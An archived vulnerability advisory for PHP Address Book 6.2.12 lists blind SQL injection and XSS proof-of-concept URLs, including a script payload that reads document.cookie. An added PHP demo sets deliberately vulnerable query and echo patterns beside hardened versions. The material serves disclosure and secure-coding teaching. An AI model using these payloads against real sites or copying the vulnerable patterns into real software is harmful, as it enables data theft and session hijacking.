ID MYHACK58:62201233332
Type myhack58
Reporter 佚名
Modified 2012-03-13T00:00:00


Author: Stefan Schurtz

Affected Software: Successfully tested on PHP Address Book 6.2.12

Developer URL:

Defect description


PHP Address Book 6.2.12 contains multiple XSS and SQL injection issues.


Proof of concept


// Blind SQL injection

http://[target]/addressbook/edit.php?id=[sql-injection]

http://[target]/addressbook/group.php?add=Add to&group=1&selected%5b%5d=1 3 2&to_group=[sql-injection]

http://[target]/addressbook/vcard.php?id=[sql-injection]

// XSS

http://[target]/addressbook/preferences.php?from='"</script><script>alert(document.cookie)</script>

http://[target]/addressbook/index.php?group='"</script><script>alert(document.cookie)</script>


Fix: validate and filter the parameters listed above (id, to_group, from, group) on the corresponding pages before they reach a query or are echoed into the page.
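The following is an added illustration of the two bug classes from the advisory, not code taken from PHP Address Book. It shows a string-concatenated lookup like the one behind edit.php?id= next to a prepared-statement version, and a raw echo of the from parameter next to an HTML-encoded one. The table schema, sample rows, function names and the exact markup are constructed for the demo; an in-memory SQLite database stands in for the application's MySQL backend.

```php
<?php
// Added example (not PHP Address Book's own code). Schema, rows, function names and
// markup are constructed assumptions; in-memory SQLite replaces the real MySQL database.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE addressbook (id INTEGER PRIMARY KEY, firstname TEXT, email TEXT)');
$db->exec("INSERT INTO addressbook VALUES (1, 'Alice', 'alice@example.test'), (2, 'Bob', 'bob@example.test')");

// Vulnerable pattern: the id parameter becomes part of the SQL text, so
// edit.php?id=1 OR 1=1 changes the query instead of being treated as a value.
function lookup_vulnerable(PDO $db, string $id): array {
    $sql = "SELECT id, firstname FROM addressbook WHERE id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: only a plain decimal id is accepted, and it is bound as an
// integer parameter, so the SQL text never changes regardless of the input.
function lookup_safe(PDO $db, string $id): array {
    if (!ctype_digit($id)) {
        return [];
    }
    $stmt = $db->prepare('SELECT id, firstname FROM addressbook WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Vulnerable pattern: the from parameter is echoed unencoded into an attribute, so the
// advisory's '"</script><script>alert(document.cookie)</script> closes the attribute
// and the tag and runs as script.
function render_vulnerable(string $from): string {
    return '<input type="hidden" name="from" value="' . $from . '">';
}

// Hardened pattern: ENT_QUOTES encodes both quote characters as well as < and >,
// so the payload is rendered as inert text inside the attribute.
function render_safe(string $from): string {
    $encoded = htmlspecialchars($from, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="from" value="' . $encoded . '">';
}

$sqli = '1 OR 1=1';
$xss  = '\'"</script><script>alert(document.cookie)</script>';

printf("vulnerable lookup with '%s' -> %d rows\n", $sqli, count(lookup_vulnerable($db, $sqli)));
printf("safe lookup with '%s'       -> %d rows\n", $sqli, count(lookup_safe($db, $sqli)));
printf("safe lookup with '1'              -> %d rows\n", count(lookup_safe($db, '1')));
echo "vulnerable render: ", render_vulnerable($xss), "\n";
echo "safe render:       ", render_safe($xss), "\n";
```

Run with `php example.php`: the vulnerable lookup returns every row for `1 OR 1=1`, while the hardened lookup rejects it and returns exactly one row for a legitimate id. The same split applies to the group, to_group and id parameters on the other pages named in the advisory.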